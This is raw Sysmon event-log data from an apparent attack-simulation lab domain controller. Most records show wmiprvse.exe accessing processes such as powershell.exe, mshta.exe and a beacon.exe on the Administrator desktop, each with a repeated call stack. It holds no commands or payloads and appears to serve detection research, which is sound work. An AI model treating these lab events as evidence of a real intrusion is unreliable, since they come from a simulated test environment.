Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.773{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.771{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.770{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.769{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.768{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.767{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.766{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.766{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.765{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.764{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.764{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002237421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:52.763{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120\PSHost.132591775726172710.4120.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002237420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.763{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 